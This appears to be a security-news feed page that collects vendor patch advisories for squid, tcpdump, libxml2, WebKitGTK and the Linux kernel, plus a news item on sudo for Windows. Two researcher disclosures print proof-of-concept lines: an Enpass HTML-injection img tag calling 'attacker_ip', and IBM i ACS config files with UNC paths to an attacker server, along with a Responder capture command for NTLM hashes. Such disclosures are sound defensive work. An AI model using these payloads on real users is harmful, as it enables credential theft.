Red Hat Security Advisory 2024-0771-03 - An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0771.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: squid:4 security update  
Advisory ID:        RHSA-2024:0771-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0771  
Issue date:         2024-02-12  
Revision:           03  
CVE Names:          CVE-2023-5824  
====================================================================

Summary: 

An update for the squid:4 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Squid is a high-performance proxy caching server for web clients, supporting FTP, and HTTP data objects.

Security Fix(es):

* squid: DoS against HTTP and HTTPS (CVE-2023-5824)

* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)

* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)

* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)

* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)

* squid: denial of service in HTTP request parsing (CVE-2023-50269)

Bug Fix(es):

* squid crashes in assertion when a parent peer exists (RHEL-18255)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-5824

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2245914  
https://bugzilla.redhat.com/show_bug.cgi?id=2247567  
https://bugzilla.redhat.com/show_bug.cgi?id=2248521  
https://bugzilla.redhat.com/show_bug.cgi?id=2252923  
https://bugzilla.redhat.com/show_bug.cgi?id=2252926  
https://bugzilla.redhat.com/show_bug.cgi?id=2254663

Red Hat Security Advisory 2024-0771-03

Red Hat Security Advisory 2024-0769-03 - An update for tcpdump is now available for Red Hat Enterprise Linux 8. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0769.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: tcpdump security updateAdvisory ID:        RHSA-2024:0769-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0769Issue date:         2024-02-12Revision:           03CVE Names:          CVE-2021-41043====================================================================Summary: An update for tcpdump is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The tcpdump packages contain the tcpdump utility for monitoring network traffic. The tcpdump utility can capture and display the packet headers on a particular network interface or on all interfaces.Security Fix(es):* tcpslice: use-after-free in extract_slice() (CVE-2021-41043)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2021-41043References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2040392

Red Hat Security Advisory 2024-0769-03

Red Hat Security Advisory 2024-0768-03 - An update for libmaxminddb is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0768.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libmaxminddb security updateAdvisory ID:        RHSA-2024:0768-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0768Issue date:         2024-02-12Revision:           03CVE Names:          CVE-2020-28241====================================================================Summary: An update for libmaxminddb is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The libmaxminddb package contains the MaxMind DB library.Security Fix(es):* libmaxminddb: improper initialization in dump_entry_data_list() in maxminddb.c (CVE-2020-28241)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2020-28241References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=1895379

Red Hat Security Advisory 2024-0768-03

Enpass Desktop Application version 6.9.2 suffers from an html injection vulnerability.

    ====================================================================HTML Injection in Enpass Desktop Application (Version 6.9.2)Product:            Enpass Password ManagerVersion:            6.9.2Issue date:        2024-02-11Download:         https://www.enpass.io/beta/Discovered by Muhammad Danial====================================================================*Overview:*A vulnerability has been discovered in the Enpass Desktop applicationversion 6.9.2 for Linux and Windows, which could potentially lead to HTMLinjection attacks. This vulnerability may be exploited by an attacker toexecute malicious code and leak NTLMv2 hashes, compromising the securityand privacy of affected users.*Vulnerability Details:*The vulnerability exists in the handling of notes within the Enpass Desktopapplication. By crafting a malicious note containing a specially craftedpayload such as <img src="http://attacker_ip/?c=" />, an attacker caninject arbitrary HTML code into the note. When the victim opens themalicious note shared by the attacker, the HTML injection payload isexecuted, allowing the attacker to capture the victim's NTLMv2 hashes andusername through their Enpass Desktop application.*Impact:*Successful exploitation of this vulnerability could result in the leakageof usernames and NTLMv2 hashes.

Enpass Desktop Application 6.9.2 HTML Injection

Microsoft said it's introducing Sudo for Windows 11 as part of an early preview version to help users execute commands with administrator privileges.
"Sudo for Windows is a new way for users to run elevated commands directly from an unelevated console session," Microsoft Product Manager Jordi Adoumie said.
"It is an ergonomic and familiar solution for users who want to elevate a command

Operating System / Technology

Microsoft said it's introducing Sudo for Windows 11 as part of an early preview version to help users execute commands with administrator privileges.

"Sudo for Windows is a new way for users to run elevated commands directly from an unelevated console session," Microsoft Product Manager Jordi Adoumie said.

"It is an ergonomic and familiar solution for users who want to elevate a command without having to first open a new elevated console."

Sudo, short for superuser do, is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, usually a user with elevated permissions (e.g., administrator).

The feature is available for Windows 11 builds 26045 and later. It can be enabled by heading to Settings > System > For Developers, and setting "Enable sudo" to On.

Sudo for Windows comes with three options: run applications in a new elevated console window, run the elevated process in the current window but with the input stream (stdin) closed, and in inline mode.

"The inline configuration option runs the elevated process in the current window and the process is able to receive input from the current console session," Redmond warns in its documentation.

"An unelevated process can send input to the elevated process within the same console windows or get information from the output in the current windows in this configuration."

Microsoft said it's also in the process of open-sourcing the project on GitHub, urging other users to contribute to the initiative as well as report issues and file feature requests.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Introduces Linux-Like 'sudo' Command to Windows 11

Gentoo Linux Security Advisory 202402-11 - Multiple denial of service vulnerabilities have been found in libxml2. Versions greater than or equal to 2.12.5 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202402-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libxml2: Multiple Vulnerabilities  
     Date: February 09, 2024  
     Bugs: #904202, #905399, #915351, #923806  
       ID: 202402-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple denial of service vulnerabilities have been found in libxml2.

Background  
==========

libxml2 is the XML C parser and toolkit developed for the GNOME project.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-libs/libxml2  < 2.12.5      >= 2.12.5

Description  
===========

Multiple vulnerabilities have been discovered in libxml2. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libxml2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.12.5"

If you cannot update to libxml2-2.12 yet you can update to the latest  
2.11 version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.11.7 =dev-libs/libxml2-2.11*"

References  
==========

[ 1 ] CVE-2023-28484  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28484  
[ 2 ] CVE-2023-29469  
      https://nvd.nist.gov/vuln/detail/CVE-2023-29469  
[ 3 ] CVE-2023-45322  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45322  
[ 4 ] CVE-2024-25062  
      https://nvd.nist.gov/vuln/detail/CVE-2024-25062

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202402-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202402-11

Debian Linux Security Advisory 5618-1 - Vulnerabilities have been discovered in the WebKitGTK web engine. An anonymous researcher discovered that a maliciously crafted webpage may be able to fingerprint the user. Wangtaiyu discovered that processing web content may lead to arbitrary code execution. Apple discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5618-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
February 08, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-23206 CVE-2024-23213 CVE-2024-23222

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-23206

    An anonymous researcher discovered that a maliciously crafted  
    webpage may be able to fingerprint the user.

CVE-2024-23213

    Wangtaiyu discovered that processing web content may lead to  
    arbitrary code execution.

CVE-2024-23222

    Apple discovered that processing maliciously crafted web content  
    may lead to arbitrary code execution. Apple is aware of a report  
    that this issue may have been exploited.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.42.5-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.42.5-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmXFXGQACgkQAAyEYu0C  
2AJWJA//fFEMVOvrgBf8I2Nnz37Bm/jR4IRM52osjsI6I23tjJ1vA9UR7Y/03QGN  
qOzfOsb6wcRGZfYdEy945N6vf/XN3opl44ApyJ6RHStbQ8EuTw+IXVSKs49x6FBC  
P7glTc3I4R5gYpOKDwc/jQwkB6VeCYPq0LeqgVNx2/Ja0eJ3KUEjXo+yYJbowRj+  
oiR9R+WKIEnz7BdxMbOLrlHc9CpR3UynozFprFha8bKNlyJAq/hwsO546NgYnSQH  
+n/hAad1NDvcptljLHrXjw/GYTVc2lEGoFFr8H8EDVdWrtzSlecHenthIxfjoKL9  
4eWGvilyZJGAKvtlaNRCFNorHTsAcqRUYhDT87TNScU+ONwdk3tdl9d4F/CcTylA  
7ZQGQ1OQk2f5h/E2Ns1CD0KE64+Qv4Eima/A7VNDKc2hXPNavaekIbziVKEJ4r+m  
ypJrJDm+RLeOcDKuyxfz6REQvAOinjMnfPQhMXRCdk4vz3RXl9bEpoao35C2rtLe  
HcL3/tg24hOooj6NJYQRuiKfmrZKhHivNrg4QJ/71Y1/JXtlmLiol6h8nfKKvb19  
ObFGbF27htKmSGXR3Oig5tQWcjhnbH4CSqXoTOYwDPRgb9dutViclKu605A97Fm5  
l5U0fyIT8mwkN/thk8KOE1AtNC2n90Y9Yx/gBPFRypHN+CBQCbY=  
=Lfkz  
-----END PGP SIGNATURE-----

Debian Security Advisory 5618-1

IBM i Access Client Solutions (ACS) versions 1.1.2 through 1.1.4 and 1.1.4.3 through 1.1.9.4 suffer from a remote credential theft vulnerability.

[+] Credits: John Page (aka hyp3rlinx)      
[+] Website: hyp3rlinx.altervista.org  
[+] Source:  http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec     

[Vendor]  
www.ibm.com

[Product]  
IBM i Access Client Solutions

[Versions]  
All

[Remediation/Fixes]  
None

[Vulnerability Type]  
Remote Credential Theft

[CVE Reference]  
CVE-2024-22318

[Security Issue]  
IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations.  
Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server.  
If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session.  
The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials.

[References]  
https://www.ibm.com/support/pages/node/7116091

[Exploit/POC]  
The client access .HOD File vulnerable parameters:

1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c

[KeyRemapFile]  
2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c

Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv

The client access legacy .WS File vulnerable parameters:  
DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c

Example, client access older .WS file

[Profile]  
ID=WS  
Version=9  
[Telnet5250]  
AssociatedPrinterStartMinimized=N  
AssociatedPrinterTimeout=0  
SSLClientAuthentication=Y  
HostName=PWN  
AssociatedPrinterClose=N  
Security=CA400  
CertSelection=AUTOSELECT  
AutoReconnect=Y  
[KeepAlive]  
KeepAliveTimeOut=0  
[Keyboard]  
IBMDefaultKeyboard=N  
DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c  
[Communication]  
Link=telnet5250

[Network Access]  
Remote

[Severity]  
Medium

[Disclosure Timeline]  
Vendor Notification:  December 14, 2023  
Vendor Addresses Issue: February 7, 2024  
February 8, 2024 : Public Disclosure

[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

IBM i Access Client Solutions Remote Credential Theft

Ubuntu Security Notice 6628-1 - Quentin Minster discovered that a race condition existed in the KSMBD implementation in the Linux kernel when handling sessions operations. A remote attacker could use this to cause a denial of service or possibly execute arbitrary code. Marek Marczykowski-Górecki discovered that the Xen event channel infrastructure implementation in the Linux kernel contained a race condition. An attacker in a guest VM could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6628-1February 09, 2024linux-intel-iotg vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-intel-iotg: Linux kernel for Intel IoT platformsDetails:Quentin Minster discovered that a race condition existed in the KSMBDimplementation in the Linux kernel when handling sessions operations. Aremote attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-32250, CVE-2023-32252,CVE-2023-32257)Marek Marczykowski-Górecki discovered that the Xen event channelinfrastructure implementation in the Linux kernel contained a racecondition. An attacker in a guest VM could possibly use this to cause adenial of service (paravirtualized device unavailability). (CVE-2023-34324)Zheng Wang discovered a use-after-free in the Renesas Ethernet AVB driverin the Linux kernel during device removal. A privileged attacker could usethis to cause a denial of service (system crash). (CVE-2023-35827)Tom Dohrmann discovered that the Secure Encrypted Virtualization (SEV)implementation for AMD processors in the Linux kernel contained a racecondition when accessing MMIO registers. A local attacker in a SEV guest VMcould possibly use this to cause a denial of service (system crash) orpossibly execute arbitrary code. (CVE-2023-46813)It was discovered that the Microchip USB Ethernet driver in the Linuxkernel contained a race condition during device removal, leading to a use-after-free vulnerability. A physically proximate attacker could use this tocause a denial of service (system crash). (CVE-2023-6039)Lin Ma discovered that the netfilter subsystem in the Linux kernel did notproperly validate network family support while creating a new netfiltertable. A local attacker could use this to cause a denial of service orpossibly execute arbitrary code. (CVE-2023-6040)It was discovered that the TLS subsystem in the Linux kernel did notproperly perform cryptographic operations in some situations, leading to anull pointer dereference vulnerability. A local attacker could use this tocause a denial of service (system crash) or possibly execute arbitrarycode. (CVE-2023-6176)It was discovered that the CIFS network file system implementation in theLinux kernel did not properly validate the server frame size in certainsituation, leading to an out-of-bounds read vulnerability. An attackercould use this to construct a malicious CIFS image that, when operated on,could cause a denial of service (system crash) or possibly expose sensitiveinformation. (CVE-2023-6606)Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel didnot properly handle dynset expressions passed from userspace, leading to anull pointer dereference vulnerability. A local attacker could use this tocause a denial of service (system crash). (CVE-2023-6622)Xingyuan Mo discovered that the netfilter subsystem in the Linux kernel didnot properly handle inactive elements in its PIPAPO data structure, leadingto a use-after-free vulnerability. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2023-6817)Budimir Markovic, Lucas De Marchi, and Pengfei Xu discovered that the perfsubsystem in the Linux kernel did not properly validate all event sizeswhen attaching new events, leading to an out-of-bounds write vulnerability.A local attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6931)It was discovered that the IGMP protocol implementation in the Linux kernelcontained a race condition, leading to a use-after-free vulnerability. Alocal attacker could use this to cause a denial of service (system crash)or possibly execute arbitrary code. (CVE-2023-6932)Kevin Rich discovered that the netfilter subsystem in the Linux kernel didnot properly check deactivated elements in certain situations, leading to ause-after-free vulnerability. A local attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2024-0193)It was discovered that the TIPC protocol implementation in the Linux kerneldid not properly handle locking during tipc_crypto_key_revoke() operations.A local attacker could use this to cause a denial of service (kerneldeadlock). (CVE-2024-0641)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.15.0-1047-intel-iotg  5.15.0-1047.53   linux-image-intel-iotg          5.15.0.1047.47After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6628-1   CVE-2023-32250, CVE-2023-32252, CVE-2023-32257, CVE-2023-34324,   CVE-2023-35827, CVE-2023-46813, CVE-2023-6039, CVE-2023-6040,   CVE-2023-6176, CVE-2023-6606, CVE-2023-6622, CVE-2023-6817,   CVE-2023-6931, CVE-2023-6932, CVE-2024-0193, CVE-2024-0641Package Information:   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1047.53

Ubuntu Security Notice USN-6628-1

Red Hat Security Advisory 2024-0764-03 - An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0764.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: container-tools:rhel8 security updateAdvisory ID:        RHSA-2024:0764-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0764Issue date:         2024-02-09Revision:           03CVE Names:          CVE-2024-21626====================================================================Summary: An update for the container-tools:rhel8 module is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The container-tools module contains tools for working with containers, notably podman, buildah, skopeo, and runc.Security Fix(es):* runc: file descriptor leak (CVE-2024-21626)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-21626References:https://access.redhat.com/security/updates/classification/#importanthttps://access.redhat.com/security/vulnerabilities/RHSB-2024-001https://bugzilla.redhat.com/show_bug.cgi?id=2258725

Tag

#linux